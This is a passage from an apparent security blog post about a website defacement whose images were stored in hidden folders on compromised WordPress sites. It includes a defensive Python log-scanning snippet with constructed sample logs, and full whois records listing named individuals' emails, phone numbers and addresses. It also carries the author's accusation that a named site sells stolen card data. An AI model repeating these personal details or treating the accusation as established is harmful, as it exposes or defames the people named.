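        if ref_host and ref_host != our_host:
            findings.append((path, ref_host))
    return findings


# Constructed sample log lines modelled on the case above; not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jan/2010:10:00:01 +0000] "GET /components/com_content/views/.index/aa__blut.gif HTTP/1.1" 200 5120 "http://internalcommunications.co.uk/index.html" "Mozilla/5.0"',
    '203.0.113.6 - - [18/Jan/2010:10:00:02 +0000] "GET /components/com_content/views/.index/4scpcn.jpg HTTP/1.1" 200 8700 "http://internalcommunications.co.uk/index.html" "Mozilla/5.0"',
    '198.51.100.9 - - [18/Jan/2010:10:00:03 +0000] "GET /wp-content/uploads/logo.png HTTP/1.1" 200 3000 "http://devriestree.com/" "Mozilla/5.0"',
    '198.51.100.9 - - [18/Jan/2010:10:00:04 +0000] "GET /components/com_content/views/.index/x.gif HTTP/1.1" 404 200 "http://internalcommunications.co.uk/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for path, ref in find_hotlinked_hidden_images(SAMPLE_LOG, "devriestree.com"):
        print(f"hidden image {path} hotlinked from {ref}")
```

Run it against a real access log by reading the file into a list of lines; a hit is a reason to inspect that directory on disk, not proof of compromise by itself.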

The site devriestree.com is hosted at Server Beach, and belongs to:

$whois devriestree.com

Whois Server Version 2.0

Domain Name: DEVRIESTREE.COM
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS.NETVTECH.COM
Name Server: NS1.GEODNS.NET
Name Server: NS2.GEODNS.NET
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 21-oct-2008
Creation Date: 19-oct-2005
Expiration Date: 19-oct-2010

Registrant:
NetVenture Technologies, Inc.
1490 S Military Trail
Suite 13E
West Palm Beach, Florida 33415
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: DEVRIESTREE.COM
Created on: 18-Oct-05
Expires on: 19-Oct-10
Last Updated on: 12-Jul-07

Administrative Contact:
DeVries, James j@netvtech.com
NetVenture Technologies, Inc.
1490 S Military Trail
Suite 13E
West Palm Beach, Florida 33415
United States
5613016666 Fax — 5618288035

Technical Contact:
DeVries, James j@netvtech.com
NetVenture Technologies, Inc.
1490 S Military Trail
Suite 13E
West Palm Beach, Florida 33415
United States
5613016666 Fax — 5618288035

Domain servers in listed order:
NS1.GEODNS.NET
NS2.GEODNS.NET
NS.NETVTECH.COM

The Web site at netvtech.com

Folks, seriously, update your WordPress installs. It’s automatic and effortless.

EDITED TO ADD:
The person who defaced the Web site and who is storing his images on hacked WordPress sites has a Web site of his own, through which he sells stolen credit card numbers, phish kits, stolen bank account information, and so on. His Web site is at

http://ne-stop.com/
hosted by Hurricane Electric.

$whois ne-stop.com

Whois Server Version 2.0

Domain Name: NE-STOP.COM
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS1.HE.NET
Name Server: NS2.HE.NET
Name Server: NS3.HE.NET
Status: clientTransferProhibited
Updated Date: 12-jan-2010
Creation Date: 11-jan-2010
Expiration Date: 11-jan-2011

>>> Last update of whois database: Mon, 18 Jan 2010 07:57:57 UTC <<<

Registration Service Provided By: Hurricane Electric Internet Services
Contact: hostmaster@he.net
Visit: hurricanenames.net

Domain name: ne-stop.com

Registrant Contact:
Ladde Weiong
Ladde Weiong ()
Fax:
125 Club Garden Road
Sheffield, S11 8BW
GB

Administrative Contact:
Hurricane Electric Internet Services
Hostmaster he.net (hostmaster@he.net)
+1.5105804100
Fax:
760 Mission Court
Fremont, CA 94539
US

Technical Contact:
Hurricane Electric Internet Services
Hostmaster he.net (hostmaster@he.net)
+1.5105804100
Fax:
760 Mission Court
Fremont, CA 94539
US

Status: Locked

Name Servers:
ns1.he.net
ns2.he.net
ns3.he.net

Creation date: 11 Jan 2010 11:56:14
Expiration date: 11 Jan 2011 11:56:14

As of the time of this writing, the front page of the site looked like this (click for larger):